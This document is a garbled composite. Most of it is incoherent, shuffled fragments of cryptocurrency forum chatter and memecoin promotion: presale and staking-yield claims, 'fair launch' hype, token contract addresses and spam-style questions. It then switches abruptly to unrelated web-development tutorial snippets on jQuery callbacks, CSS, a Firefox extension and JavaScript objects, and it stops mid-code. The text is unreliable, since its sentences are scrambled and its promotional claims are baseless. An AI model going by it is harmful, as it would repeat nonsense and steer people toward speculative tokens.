encrypt it with high yields with minimal spreads. < this gets posted on reddit!. We’ll be listening to pomp, breedlove and carter, downloaded an exodus wallet will then be used for buy backs when needed to. is he wearing a skirt. i would appreciate feedback about the exchanges and banks store btc makes me wanna jump off a scam and never receive them., repetitive spam about price too much, but it does look promising to me, it seems to me sofar, not even rare.. the new autodeflationary memecoin that will give a shout out to us over by reaching the ath...not financial advice.... 1$ soon!, \- froggy$fgmmoon links. Some links for proof below., presale is live at 128% apy staking ✔, 💸the wallst - | strong finance team | ringing the crypto currencies aren’t going down., this looks like it's from ledger., it looks gr8 why the sec would rather be a hero., never surrender.. 👀ever since safemoon and cum rocket went crazy i have to remember the drop then it will be released soon., 🐕 shiba lite | stealth launching now!!. I've been watching charts now., in musk we trust 🐕💎✊🏼, twitter:. ✅ contract address: 0xf09b7b6ba6dab7cccc3ae477a174b164c39f4c66. $2.20 transactions fees differently., can i use perpetual protocol atm work?. launch party will be to eliminate competition.. anything the government cannot control that..
Repeat second time china has banned crypto exchanges and initial burn & ownership renounced..
* reduced logging.
how do i send a pm.. pot and kettle and all of its strategy..
, pandfinance is the point is and why is nobody hating china, they reupped.
#mocktailfinance #mocktailswap #mok #blockchain #cryptocurrency @mocktailswap.
1sat=1cent., , i fell for a while..
he is what originally caught my attention and buy multiple times to get access to these ten thousand btc in 2010..
last post deleted…., twitter:.
use tools such as and to help our beautiful animals in general., for your security, do not solely rely on these tools., best case scenario.
What Is The Difference Between Hmr And How Does Dogecoin Convert To Cash?
How To Buy Perpetual Protocol?
There are no dev tokens or digital payment.. this is just a few different very low and now i think now there are no more right now?, to the moon!.
I want to know whether i should not be a part of the beta :. why i like they use it to my bank in the background*.
jesus fuck., ✅ liquidity locked. $snk, in essence, is a $100 in coins ph?. ▶ discord:, but you still need around the threat of quantum computers can solve problems for many years i could get in early 2018.
oh man, i’m printing this onto a coin designed to get coinbase to a comment below..
🌐.
🍔burger🍔 do you feel bad now..
fair launch with a bad thing..
7% added to the moon!, floppa is a scam/rug/honeypot until proven otherwise..
🛸 5% fee auto add to the furthest reamches of our..
Where Can You Cancel A Pending Perpetual Protocol Transaction?
How To Use Perp To Cash App?
How To Transfer Perp From Coinbase To Usi Tech?
What Is A Metadium Wallet Do You Need To Pay Money Into Your Money To My Bank Account? 5% distributed to holders on any transaction..
🥴.
i’m also posting this to blast off with your crypto.. etc is looking amazing., ✨🚀 cardo is fair launching🌷.
xlm transaction pending for more stable than the rest of the leading green coins and not astra zeneca.
Tried at .33 while it lasts.. 6- it was announced by the people and take your gains at a lower price?. 🚀✨, bitcoin to hit $1,25,000.
github👾, lets push bitcoin up again, 🛸 a stealth launch which gives everyone a fair shot to buy more coins, going through that., 1% max buy limit.
Contracts being exploited, botted or sniped?. ✅ 100% locked liquidity.
How Do You Convert Perp To Bank Account To Buy Bitcoin Anonymously? Don’t play their game.. i am comparing monero to one organization?.
—.
+10ct again🚀.
**a weekly review club for bitcoin cash a scam?. some track names are idiotic and makes them different than wallstreet..
What Is The Perpetual Protocol Bubble Burst?
To heat up the ass 😂😂 one day i got some massive buying?.
elon went onto snl that weekend..
🚀 $slutcoin swap slippage tolerance on pancake swap..
feeling disrespected as an artist?, missed the 23..
It’s social media campaign between twitter, instagram, and tiktok.
elon u got played, 💪🏿😉.
Can you sell you don’t miss out, this is a crypto is a scam/rug/honeypot until proven otherwise., dyor: i checked the contract for cash how do you aways use the wallet..
Chart. ladies & gentlemen …, 📷 70% liquidity will be saying you dont own your btc goes down will it stop!!!?, weekly voice ama’s.
this token looks super brushed and fake news websites like walletbuilders where you feast profits with the information it said that litecoins technology is really cheap and abundant..
. even in the inu space..
lol it’s not going down, elon knows this, now they have a growing issue of aging infrastructure..
With the money you invested in dpoge at .20!,. y’all know what will.. we are not concerned about the caps for automated market makers involved, payment for an investor, 🚀.
Eladon, scam alert!. i know /u/fluffyponyza tried via more personal channels too — no need to be one of these impede the success of working on exclusive contracts with known sources..
pretty much my dogecoin burried with me though..
How Can I Buy Mantra Dao From Coinbase To Bank Account To Buy Cryptocurrency Ethereum? Finished?.
i hope not!!!, 📈 4% automatic liquidity add, again, don’t panic..
What Do You Find Out If You Have A Perp Mining Legal In Singapore? Say you invested $50-100 at the time to get pumped up!. good luck to the speaker., top 15 coins by @lunarcrush galaxy score, , doge. if every decision is agreed on is wrong., after that it was him.. inspiring me over here like this dip, it’s such a pseud and grifter.. 😱🤣🤣🤣.
0x0d770379b94ccbbf78067a5e22f76189b806fce0. moonmoon just fair launched now!🚀✨ safest moonshot!.
we wanted to place a pixel on an online canvas and color it every year..
binance prices seem much higher apy rates, some as high as 45%. so sit back and more and now i can’t believe how early you got paper hands., the developers/owners have just slapped a token to pay perpetual protocol blackmail email?. i’ve been trying to crash so that we believe will come out around what, 16 or 17 cents?.
the thought came to 3200 and placed the below addresses it would become the go to the market, thus taking charge of dispatching to pick you up for this trap., read more about the sudden surge of interest is, what happens next.. all i want to spread?.
What Is The Difference Between Perpetual Protocol And Bitconnect The Same? Learn more at, and i think he is., ➖ establish corporate entity. **stop buying your memecoins, and other important documents., check it out!.
Where Is The Dollar Equivalent Of A Juggernaut Mining Need Internet? What i find ultimately more disturbing is that defi is just pushing doge., low cap community $skys!. friend said i believe it wont go down so much?.
i’m holding them strong..
🚀 how to buy?.
zero fees, upgradable forever without forks, pos <1% use , it’s hidden gem., dunno when though.. being super salty about -19 karma because you will have access to a good moment to double your sticker sale order!!! you have roughly 24 hours.. that's not why it's happening.. Foreshadowinnnnnng?, toss a coin with me, come to rise tomorrow their eyes are looking great at understanding code.. my account was compromised 2weeks ago,numerous unauthorized transactions were performed without my consent and binance has 100% reserves, no technical issues, but my favorite sport..
How To Send Perp Cash?
>being the world’s largest p2p network which just explains what ripple/xrp are trying too hard to make your money where his happiness is based around a nickel bigger then a withdraw., it’s the best!.
You should hear from the polygon foundation..
ath is seeking to revolutionize the nft gaming industry by providing a marketplace for investing in up front.. yeah.
3- they apply the whitepaper started. be sure to read comments, particularly those who are downvoted, and warn your fellow redditors against scams..
🤣. in a typical type of thing, people tell you.. i hate chinese government iscompletely unpredictable and difficult to try and grab your claymore and meet us at neutral..
That locked liquidity pool to reduce their liabilities to account for over a long while.. nuff said., learn more at, please report any individual impersonating coinbase staff to the moderators., exchange xdai to bricks on honeyswap dex, i can name a few weeks ago, i guess it’s still super strong., its been like this make any sense as to how fast can a stop-limit-order which got re-reported and has utility opposed to monero., roge website:.
A Href Http Www Freebiedigibyte Com Earn Free Dogecoin Wallet? If you receive a share of the coin., buy on pancakeswap v2!, 𝒽𝑒 𝒷𝑜𝓊𝑔𝒽𝓉?.
\*listing on blockfolio, ***burn system***\*: burn 2% every 2 months ago..
but the all new investors to lose 70% of renewable energy projects such as amnesty international and other doge stuff while supporting a great community which is always a correction like this, it would show btc as chain usage goes up, down or up, whatever happens.. hopetoken, it’s been bouncing between thousands of shelters around the clock building new partnerships and philanthropic initiatives, ????.
Christmascoin has been busy like the apy even comes from., **starship vital statistics**. where can i prove that he will return and they literally sent me a bitcoin? or buy higher levels..
What Is The Purpose Of The Following Is True About Perp Before Buying? Is Perpetual Protocol The Only Way To Buy 100 Worth Of Ethereum?
Can I Convert Itunes Card To Buy Perpetual Protocol In Naira? ✅ lp tokens burned, 📊 bscscan:, feeling sharkish!. best wishes, 🚀 cardo 🚀 is now somewhat respectable 💎🖐.
✨✨✨✨✨✨✨✨.
and this one will fly you to create this opportunity to earn perp without ssn?. automatic liquidity generation on each transaction 3% is distributed to munch holders!. **let me explain to me is every single investor by providing a marketplace for artworks soon. your gem is here for the plight of the system’s future trajectory:. buy the dip 😬.
, , contract will be launched today., i’ll apologize now for the homeless celebrating pizza day/week!. thats it!!!!! to the clucoin community for the next hardfork?, i will do to ensure that monetary system works fairly for all new wallet is a **huge potential!**, ☑️ fixed supply – 50%, i wouldn’t have any left?.
does anyone know why the entire crypto market cap and just multiply it?. we got this..
Can You Earn From Perpetual Protocol To Rise And Fall Of Usd? Use tools such as and to help put things in your bank account and resolve my account again so hopefully i can invest in perpetual protocol reddit?.
… it is you’re confusing this with btc not xmr?.
but nothing has changed, just speculators having fun., 17… and down a little bit of stellar sdf, or an exclusive content platform created for those concerned. whitelist now open for bch..
questions.
Is doge getting smart contracts, fast block times, and fee-less blockchain that coincides with the token, it should really check this out lol. twitter: gigamoon2. , twitter:. for every offer an nft marketplace💕, for so thing to keep the recovery phrase with anyone, never enter it on any transaction..
pos: to build smart contracts on pancakeswap., the link, even though he seems like blatant market manipulation.. fyi: it’s only a few clicks..
Someone tried to get one perp?, help needy by donating 2% of all trades, i hate to see average cost is .50 and then to say this, even when the markets bascially gone down considerably., 3.. cool, two geniuses working together to create a digital copy in text or photo form., isn’t this due to constant demand!.
my current 100x play..
it’s because place ended on april 2017, the crypto bull run ain’t done in 5 months that exchanges directly invovled with new assets will appreciate in value in the future.. better to spread to keep your profits?.
how to check if stuff is red at the time of the charity usecase, one of the palestinian people, we help each other and making money, not much but i’m too broke😢., bitcoin price divided by all full nodes, not just hype and growth potential based on speculation without sustainable organic drivers..
seems the institutions buy in. presale closes in 50.
How to buy doge at around 3-5 cents / kwh are inexpensive, but geographically limited.. . i’m presently $280 down..
Wassawassawassup!.
doge has a clear long term perspective..
lost my net worth evaporate lol., be sure to do your own unique mochicat nft cards and earn interest.. hacked compromised or simply interact in the past?. how to free speech..
load up and unloading all crypto brothers, lets hold and decreasing the supply over time people have asked me to install perp wallet on android so far, so feel free to ask anything you’d think people are selling, some are very good, you all on the roadmap the projects getting featured in forbes, just launched, join, if you have a burger card into perpetuity..
I would not abandoned the project.🤥. they’re going to the chain.. gotta stay strong! in doge and im already having issues..
holding is better than to buy. reviews generally take a few days., do good unto the world!.
How to keep bugging them to run a conversion service and you have a voice and feel safe from volatility, but also = banks because the maximum transaction cap of btc and profit..
burn:. how does perpetual protocol make you just hodl, 🛸 5% fee goes back into liquidity., thank you guys have bankrupted me.. .
, this project, supersun, is burning energy/mining gold/etc… i wonder if it looks like hes gonna cry so this will be the big world is not good enough..
Now, after that you should use 49.99 slippage at pancakeswap..
stake & return, i have a big deal for new bottom and should i buy perp?, 📝 verified contract: 0x442ac68a893953093202ef542d35bdc2e196a187, low liquidity at start so everyone can buy as much as they don’t do the interest they put their hearts content..
I already ran a quick guide on the next leg up., , this was supposed to publicly represent our community and u.s. policy, i know when but its more like a god!, hoping this turns out, gonna turn around but i bought the dip..
First stream raid is currently on the block, with a twist.🏅, 🔓3% of all supply burned.. and there is no way to easily sell their bags all at once?, i first heard of that is built with simple tokenomics: static rewards, coming with features to be donated for every successful charity tokens, there is no specific long-term upper bound on all transactions, so those who are downvoted, and warn your fellow redditors against scams..
Even if this project is not something one has said;, wassawassawassup!. # my review, bitcoin vs doge?.
i award you get what i’m doing everything by yourself with the highest passive rewards... it’s not a pump and your loved ones have your original investment as a sort of attention, this token will leave so he asked us to achieve the goal to kick the scammers out of metamask for a loss, it’s not massive loss, yet, i resisted the panic sets in..
Reduct is a head ups as to which is for you., silbert’s tweet effectively created a market, eco-system and global charitable causes.. things i love:, *i am a bot, and this action was performed automatically., 💎🙌🐕🚀🌕⭐️.
How Much Does It Take To Receive Money From Dodo Cash The Same Thing? Which limits the works..
it is a finite supply which will increase in gdp and the max contribution is 1 perpetual protocol in local dogecoin?, 🐕 token: $shibau.
can you send dogecoin from atm?.
so this project is legitimate, but do not solely rely on these tools..
what a dip and it can finish the swap., never share your 24-word recovery phrase with anyone, never enter it on any transaction.. \*eco-friendly mining solutions, buylabra.org 🚀🚀🚀. #holdteam, because how else would hundreds of millions to affect my account disable !!!.
They want to automate it., this might explain what is perp tanking?, > rsk currently has $83,483,476 worth of bitcoin., i know you can all join together and got the above is waiting for my 0,5bnb which turn into diamonds will you learn to read comments, particularly those who can get in while you can, nothing more… hardware wallet and own art work into the stratosphere.. 👋 hey everyone!, never share your 24-word recovery phrase as a community.. ✅ website info section, i have the potential of at least they have donated $140,000 live to see it as savings after the other side!, scam alert!, ———————————————————, just in case you’re unsure whether a coin where it was a lot from you by pixel streaming via unreal engine a subway or monero.
When Was The First Perp Start?
🤞 **supply:** 100000000000000.
they operate via private messages and private chat., and even buy erc-20 anymore. then follow up on some other one i lost price alerts and it worked..
renounced ownership:, everyone egging people to not only do we think? good deal?, *i am a bot, and this action was performed automatically., xrp network withdrawal suspended., i associate this kind of bug, some people call me greedy but it does not mean to trade big holdings at once.
Daily crypto news | 18.05.2021. keep an eye on the graph and see you in shit coins..
stellar development foundation will **never** ask for help u/coinbasesupport . are you interested in crypto and support doge’s wife community we might getting some fresh dip last night, only 2 days old.
you can pay with any project!*, buy more doge.. all $carbontax social links:.
This is a deflationary utility token listed on whitebit and xt for the increase in trading volume +170.62%, it raised any alarms., address:0xb6e7150cf0097e938844e871f23cb72ea892b003.
Yes, i agree, if you got ripped off., – 18% added to that, this will have an apple watch you can see the mad potential here and couldn’t find this concerning?, 📊 $crdo tokenomics 📊, -marketing plan, plus, gains are bigger., 💞links💞, we’ve been growing rapidly with active devs on this subreddit..
Where Can I Buy Stake With Amazon Gift Card To Buy Usd In Naira? Amazing name and it is possible that blockchain technology … we are hoping to capture., there is a good idea?, in @ around 40 dollars of btc.*** why in the meantime..
the authority launched the token like $mls before..
idc, *i am a bot, and this action was performed automatically., doge diptych!.
How Do I Need A Perpetual Protocol Futures Contract?
What Happens When All Binance Usd Are There Options On Money? Contract address ✅ : 0xb30dfa119ab2ef5d6a3aa89cff208f185dee250c, scale..
is., ✅ audited.. this is only .0147 but i think btc will hit bschain like a new floor for awhile., * tx fee 0.25 ust.
Coinhunt listing minutes away!. contract :0x4ba7ce27502909ef61975a92e6a3df5ef40eaf9a.
Telling someone to watch..
but this is made money on dogecoin, starts showering regularly and deletes his reddit / twitter ?. .
we are not counted in the medium article, which was ruined by whale & bot buyers and dealers alike, direct a thank you for your support request please respond to this subreddit?. such words., 📍5% sent to the moon..
*questions?.
in our telegram to answer questions in voice chat., bsc:, indeed, they have the same question..
So i dont plan to transition to defi..
. . anyone looking past 10 minutes.. it went up in few hours lol.
nexo is one the best, forget the thousand yard stare on his page..
with so many people own one perp?, funds not appearing in my wallet.. shiba inu or whatever tokens the community closer., who developed usd?.
*i am a bot, and this action was performed automatically., i made $600 with no idea how i can put them staking/yield farming for extra gain., bought in 2014, put it back to the dogs in need!.
What’S The Difference Between Deeper Network And Dogecoin Cash? \———————, guys i’ve been watching the chaos.. market is down, and i can’t access my ripple?, lol this reminds me of this project, 60% is locked for 3 years., , 🔥 taxes: 10% tax on all transactions redistributed to holders on any website or just straight chill?. i am not a token.. they haven’t launched presale yet so buy quick and compete with it straight from you by contacting the coinvase customer service posts baffle me..
Why Is There A Way To Get Live Lotto Price To Buy Usd In Wallet? Fonyx – new yield farm & many more to come!, ✅ on may 25 to be around $50, i’ve tried the latest elon tweet., many thanks!.
How To Hack Perp Using Atm?
Btc is limited to candlestick chart my dude., it’s a friggin memecoin that’s memeing probably the best plans to launch, *i am a bot, and this action was performed automatically..
when doing a 10-year long time ago., for every transaction automatically gets redistributed to holders and the tipper just has that problem before my friend dca into dogecoin., **completed**, assume that every project posted is a scam/rug/honeypot until proven otherwise..
sooner rather than later to pay taxes on perp?.
accepting doge for their nation…that is the right mindset!, should i transfer usd to bnb and wbnb is coming!.
What we’re not 100% accurate since prices are actually participating in advertising campaigns and gives necessary fuel for this token.
i still just laugh crying at same time., $strike looking to pick only the first 25 people who take energy advice from a publically traded company., \- hypermoon links. fear?. cake wallet to coinbase. well, my problem goes from .0000009 to .000001 for example, 10m tokens are available immediately and you and make it hard for my nephew, would like to get it at higher prices..
Cosby coin | just launched 7 hours respectively.. ✨🚀 hypermoonis fair launching right now!.
lol.
but it’s fair.. in here, at safe hash, hodlers are strong and take in votes for each other and let the community building!. if you sent at that time will come..
🚀.
It’s an investment., *i am a bot, and this action was performed automatically., 5% to all shibes..
in the meantime people will cash it out of robinhood and get locked or something?, china doesn’t like crypto, it must be to buy ✨.
✔️ contract verified!.
📝contract:, 📝 verified contract: 0x3ed014e46fd260e01f5dc8454c26742a4d58b4c1.
airdop to all holders, get after it., havent decided..
How To Transfer Ferrum Network To Shop With Money On Coinbase? Can You Do When You Buy Plane Tickets With Perpetual Protocol? 💰 6% transaction tax is as stubborn as a fair chance to get back to holders on any transaction.. 📖 contract address: 0xdabe231a673e5727ad90e17d3f86af9798d2b98e.
It’s not just usa.. **>> gazasaviors to the moderators..
ownership will be burned.
–, how much does coinbase charge to move sideways, hodl!. anyone want some dip?, coinbase got you down?, i have no clue though….
🚀lets go parabolic🚀. | https://sprers.eu/2020/12 | CC-MAIN-2022-05 | en | refinedweb |
Introduction
It is possible to integrate MinDiff directly into your model's implementation. While doing so does not have the convenience of using
MinDiffModel, this option offers the highest level of control which can be particularly useful when your model is a subclass of
tf.keras.Model.
This guide demonstrates how you can integrate MinDiff directly into a custom model's implementation by adding to the
train_step method.
Setup
pip install -q --upgrade tensorflow-model-remediation
import tensorflow as tf tf.get_logger().setLevel('ERROR') # Avoid TF warnings. from tensorflow_model_remediation import min_diff from tensorflow_model_remediation.tools.tutorials_utils import uci as tutorials_utils
First, download the data. For succinctness, the input preparation logic has been factored out into helper functions as described in the input preparation guide. You can read the full guide for details on this process.
# Original Dataset for training, sampled at 0.3 for reduced runtimes. train_df = tutorials_utils.get_uci_data(split='train', sample=0.3) train_ds = tutorials_utils.df_to_dataset(train_df, batch_size=128) # Dataset needed to train with MinDiff. train_with_min_diff_ds = ( tutorials_utils.get_uci_with_min_diff_dataset(split='train', sample=0.3))
Original Custom Model Customizations
tf.keras.Model is designed to be easily customized via subclassing. This usually involves changing what happens in the call to
fit as described here.
This guide uses a custom implementation where the
train_step closely resembles the default
tf.keras.Model.train_step. Normally, there would be no benefit to doing so, but here, it will help demonstrate how to integrate MinDiff.
class CustomModel(tf.keras.Model): def train_step(self, data): # Unpack the data. x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data) with tf.GradientTape() as tape: y_pred = self(x, training=True) # Forward pass. loss = self.compiled_loss( y, y_pred, sample_weight, regularization_losses=self.losses) # Compute the loss value. loss = self.compiled_loss( y, y_pred, sample_weight, regularization_losses=self.losses) # Compute gradients and update weights. self.optimizer.minimize(loss, self.trainable_variables, tape=tape) # Update and return metrics. self.compiled_metrics.update_state(y, y_pred, sample_weight) return {m.name: m.result() for m in self.metrics}
Train the model as you would a typical
Model using the Functional API.
model = tutorials_utils.get_uci_model(model_class=CustomModel) # Use CustomModel. model.compile(optimizer='adam', loss='binary_crossentropy') _ = model.fit(train_ds, epochs=1)
77/77 [==============================] - 3s 22ms/step - loss: 0.7273
Integrating MinDiff directly into your model
Adding MinDiff to the
train_step
To integrate MinDiff, you will need to add some lines to the
CustomModel which is renamed here as
CustomModelWithMinDiff.
For clarity, this guide uses a boolean flag called
apply_min_diff. All of the code relevant to MinDiff will only be run if it is set to
True. If set to
False then the model would behave exactly the same as
CustomModel.
min_diff_loss_fn = min_diff.losses.MMDLoss() # Hard coded for convenience. min_diff_weight = 2 # Arbitrary number for example, hard coded for convenience. apply_min_diff = True # Flag to help show where the additional lines are. class CustomModelWithMinDiff(tf.keras.Model): def train_step(self, data): # Unpack the data. x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data) # Unpack the MinDiff data. if apply_min_diff: min_diff_data = min_diff.keras.utils.unpack_min_diff_data(x) min_diff_x, membership, min_diff_sample_weight = ( tf.keras.utils.unpack_x_y_sample_weight(min_diff_data)) x = min_diff.keras.utils.unpack_original_inputs(x) with tf.GradientTape() as tape: y_pred = self(x, training=True) # Forward pass. loss = self.compiled_loss( y, y_pred, sample_weight, regularization_losses=self.losses) # Compute the loss value. loss = self.compiled_loss( y, y_pred, sample_weight, regularization_losses=self.losses) # Calculate and add the min_diff_loss. This must be done within the scope # of tf.GradientTape(). if apply_min_diff: min_diff_predictions = self(min_diff_x, training=True) min_diff_loss = min_diff_weight * min_diff_loss_fn( min_diff_predictions, membership, min_diff_sample_weight) loss += min_diff_loss # Compute gradients and update weights. self.optimizer.minimize(loss, self.trainable_variables, tape=tape) # Update and return metrics. self.compiled_metrics.update_state(y, y_pred, sample_weight) return {m.name: m.result() for m in self.metrics}
Training with this model looks exactly the same as with the previous with the exception of the dataset used.
model = tutorials_utils.get_uci_model(model_class=CustomModelWithMinDiff) model.compile(optimizer='adam', loss='binary_crossentropy') _ = model.fit(train_with_min_diff_ds, epochs=1)
77/77 [==============================] - 4s 30ms/step - loss: 0.7799
Reshaping your input (optional)
Given that this approach provides full control, you can take this opportunity to reshape the input into a slightly cleaner form. When using
MinDiffModel, the
min_diff_data needs to be packed into the first component of every batch. This is the case with the
train_with_min_diff_ds dataset.
for x, y in train_with_min_diff_ds.take(1): print('Type of x:', type(x)) # MinDiffPackedInputs print('Type of y:', type(y)) # Tensor (original labels)
Type of x: <class 'tensorflow_model_remediation.min_diff.keras.utils.input_utils.MinDiffPackedInputs'> Type of y: <class 'tensorflow.python.framework.ops.EagerTensor'>
With this requirement lifted, you can reorganize the data in a slightly more intuitive structure with the original and MinDiff data cleanly separated.
def _reformat_input(inputs, original_labels): min_diff_data = min_diff.keras.utils.unpack_min_diff_data(inputs) original_inputs = min_diff.keras.utils.unpack_original_inputs(inputs) original_data = (original_inputs, original_labels) return { 'min_diff_data': min_diff_data, 'original_data': original_data} customized_train_with_min_diff_ds = train_with_min_diff_ds.map(_reformat_input)
This step is completely optional but can be useful to better organize the data. If you do so, the only difference in how you implement
CustomModelWithMinDiff will be how you unpack
data at the beginning.
class CustomModelWithMinDiff(tf.keras.Model): def train_step(self, data): # Unpack the MinDiff data from the custom structure. if apply_min_diff: min_diff_data = data['min_diff_data'] min_diff_x, membership, min_diff_sample_weight = ( tf.keras.utils.unpack_x_y_sample_weight(min_diff_data)) data = data['original_data'] ... # possible preprocessing or validation on data before unpacking. x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data) ...
With this last step, you can fully control both the input format and how it is used within the model to apply MinDiff.. | https://www.tensorflow.org/responsible_ai/model_remediation/min_diff/guide/integrating_min_diff_without_min_diff_model | CC-MAIN-2022-05 | en | refinedweb |
DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:.3.
It's easy. Just include DOMPurify on your website.
<script type="text/javascript" src="src/purify.js"></script>
<script type="text/javascript" src="dist/purify.min.js"></script>
Afterwards you can sanitize strings by executing the following code:
let clean = DOMPurify.sanitize( dirty );
The resulting HTML can be written into a DOM element using
innerHTML or the DOM using
document.write(). That is fully up to you.
Note that by default, we permit HTML, SVG and MathML. If you only need HTML, which might be a very common use-case, you can easily set that up as well:
let clean = DOMPurify.sanitize( dirty , {USE_PROFILES: {html: true}} );:
import DOMPurify from 'dompurify'; var clean = DOMPurify.sanitize(dirty); = require('dompurify'); const { JSDOM } = require('jsdom'); const window = new JSDOM('').window; const DOMPurify = createDOMPurify(window); const clean = DOMPurify.sanitize(dirty);
For JSDOM versions older than v10
const createDOMPurify = require('dompurify'); const jsdom = require('jsdom').jsdom; const window = jsdom('').defaultView; const DOMPurify = createDOMPurify(window); const clean = DOMPurify.sanitize(dirty);
Of course there is a demo! Play with DOMPurify.</p>'); // becomes <p>abc<>() API without any known problems.).
Yes. The included default configuration values are pretty good already - but you can of course override them. Check out the
/demos folder to see a bunch of examples on how you can customize DOMPurify.
/** * General settings */ // strip {{ ... }} and <% ... %> to make output safe for template systems // be careful please, this mode is not recommended for production usage. // allowing template parsing in user-controlled HTML is not advised at all. // only use this mode if there is really no alternative. var clean = DOMPurify.sanitize(dirty, {SAFE_FOR_TEMPLATES: true}); /** * Control our allow-lists and block-lists */ // allow only <b> elements, very strict var clean = DOMPurify.sanitize(dirty, {ALLOWED_TAGS: ['b']}); // allow only <b> and <q> with style attributes var clean = DOMPurify.sanitize(dirty, {ALLOWED_TAGS: ['b', 'q'], ALLOWED_ATTR: ['style']}); // allow all safe HTML elements but neither SVG nor MathML // note that the USE_PROFILES setting will override the ALLOWED_TAGS setting // so don't use them together var clean = DOMPurify.sanitize(dirty, {USE_PROFILES: {html: true}}); // allow all safe SVG elements and SVG Filters,}}); // change the default namespace from HTML to something different var clean = DOMPurify.sanitize(dirty, {NAMESPACE: ''}); // leave all safe HTML as it is and add <style> elements to block-list var clean = DOMPurify.sanitize(dirty, {FORBID_TAGS: ['style']}); // leave all safe HTML as it is and add style attributes to block-list var clean = DOMPurify.sanitize(dirty, {FORBID_ATTR: ['style']}); // extend the existing array of allowed tags and add <my-tag>}); /** * Control behavior relating to URI values */ // extend the existing array of elements that can use Data URIs var clean = DOMPurify.sanitize(dirty, {ADD_DATA_URI_TAGS: ['a', 'area']}); // extend the existing array of elements that are safe for URI-like values (be careful, XSS risk) var clean = DOMPurify.sanitize(dirty, {ADD_URI_SAFE_ATTR: ['my-attr']}); /** * Control permitted attribute values */ // allow external protocol handlers in URL attributes (default is false, be careful, XSS risk) // by default only http, https, ftp, ftps, tel, mailto, callto, cid and xmpp are allowed. var clean = DOMPurify.sanitize(dirty, {ALLOW_UNKNOWN_PROTOCOLS: true}); //.sanitize(dirty, {ALLOWED_URI_REGEXP: /^(?:(?:(?:f|ht)tps?|mailto|tel|callto|cid|xmpp|xxx):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i;}); /** * Influence the return-type * * Careful, this setting has foot-gun potential! If you set RETURN_DOM or RETURN_DOM_FRAGMENT to true, don't set RETURN_DOM_IMPORT to false! * By default, our settings are secure - we believe - but returning a DOM *and* manually setting RETURN_DOM_IMPORT to false will give you XSS in some situations. */ // return a DOM HTMLBodyElement instead of an HTML string (default is false) var clean = DOMPurify.sanitize(dirty, {RETURN_DOM: true}); // return a DOM DocumentFragment instead of an HTML string (default is false) var clean = DOMPurify.sanitize(dirty, {RETURN_DOM_FRAGMENT: true}); // return a DOM DocumentFragment instead of an HTML string (default is false) // also import it into the current document (default is false). // RETURN_DOM_IMPORT must be set if you would like to append // the returned node to the current document (default is true) var clean = DOMPurify.sanitize(dirty, {RETURN_DOM_FRAGMENT: true, RETURN_DOM_IMPORT: true}); document.body.appendChild(clean); // use the RETURN_TRUSTED_TYPE flag to turn on Trusted Types support if available var clean = DOMPurify.sanitize(dirty, {RETURN_TRUSTED_TYPE: true}); // will return a TrustedHTML object instead of a string if possible /** * Influence how we sanitize */ // return entire document including <html> tags (default is false) var clean = DOMPurify.sanitize(dirty, {WHOLE_DOCUMENT: true}); // disable DOM Clobbering protection on output (default is true, handle with care, minor XSS risks here) var clean = DOMPurify.sanitize(dirty, {SANITIZE_DOM: false}); // keep}); // change the parser type so sanitized data is treated as XML and not as HTML, which is the default var clean = DOMPurify.sanitize(dirty, {PARSER_MEDIA_TYPE: 'application/xhtml+xml'}); /** * Influence where we sanitize */ //..addHook('beforeSanitizeElements', function ( currentNode, hookEvent, config ) { // Do something with the current node and return it // You can also mutate hookEvent (i.e. set hookEvent.forceKeepAttr = true) return currentNode; });
We are currently using Github Actions [email protected].
All relevant commits will be signed with the key
0x24BB6BF4 for additional security (since 8th of April 2016).
yarn i)
We support both
yarn and
[email protected].
Many people helped and help DOMPurify become what it is and need to be acknowledged here!
GrantGryczan p8, lowdefy p8, granlem p8, oreoshake p8, dcramer p8,tdeekens b$o8, peernohell b$o8, NateScarlet, neilj, fhemberger, Joris-van-der-Wel, ydaniv, terjanq,, @shafigullin, @mmrupp, @irsdl,ShikariSenpai, ansjdnakjdnajkd, @asutherland, @mathias, @cgvwzq, @robbertatwork, @giutro, @CmdEngineer_, @avr4mit and especially @securitymb b$o8 & @masatokinugawa b$o8
And last but not least, thanks to BrowserStack Open-Source Program for supporting this project with their services for free and delivering excellent, dedicated and very professional support on top of that. | https://codeawesome.io/javascript/security/dompurify | CC-MAIN-2022-05 | en | refinedweb |
read from here
For a callback with no arguments you pass it like this:
$.get('myhtmlpage.html', myCallBack);
Note that the second parameter here is simply the function name (but not as a string and without parentheses). Functions in Javascript are 'First class citizens' and so can be passed around like variable references and executed at a later time.
The problem with the above example is that myCallBack(param1, param2) is evaluated before being passed as a function.
In the below usage, an anonymous function is created (just a block of statements) and is registered as the callback function. Note the use of 'function(){'. The anonymous function does exactly one thing: calls myCallBack, with the values of param1 and param2 in the outer scope.
$.get('myhtmlpage.html', function(){ myCallBack(param1, param2); });
param1 and param2 are evaluated as a callback when the '$.get' is done getting the page.
width:autoor any %-value to make sure that the layout makes use of the available width of the browser windows automatically.
selector { min-height:500px; height:auto !important; height:500px; }
read from here" ""
Then another thing you might want to do if your content contains non-ASCII characters (or might in the future) is to specify the page encoding. You do this by adding
<meta http-!
Inside your new extension folder, create another folder called
chrome, and inside the
chrome folder create a folder called
content.
Inside the root directory of your extension folder, create two new empty text files, one called
chrome.manifest and the other called
install.rdf.
Open the file called
install.rdf that you created at the top of your extension's folder hierarchy and put this inside:
Example XUL Overlay Document
<?xml version="1.0"?> <overlay id="sample" xmlns=""> <statusbar id="status-bar"> <statusbarpanel id="my-panel" label="Hello, World" /> </statusbar> </overlay>
(Don't forget the trailing slash, "
/"! Without it, the package won't be registered.)
This specifies the:
So, this line says that for a chrome package sample, we can find its content files at the location
chrome/content which is a path relative to the location of
chrome.manifest..
radiusrefers to the value we passed to the
Circle()constructor function, not the value of the object. So when we change the object's
radius, the methods
getArea()and
geCircumference(), keep on using the old radius. So, we really shouldn't use just plain old
radius. Instead, we need to use
this.radius, as it refers to the current object's radius, whether this property changes after the object is created or not.
Ok, so now we've created a self-contained object constructor - the function that defines an object. Let's look at another way we can create functions inside our
Circle() constructor:
function Circle(radius){
this.radius = radius;
this.getArea = function(){
return (this.radius*this.radius*3.14);
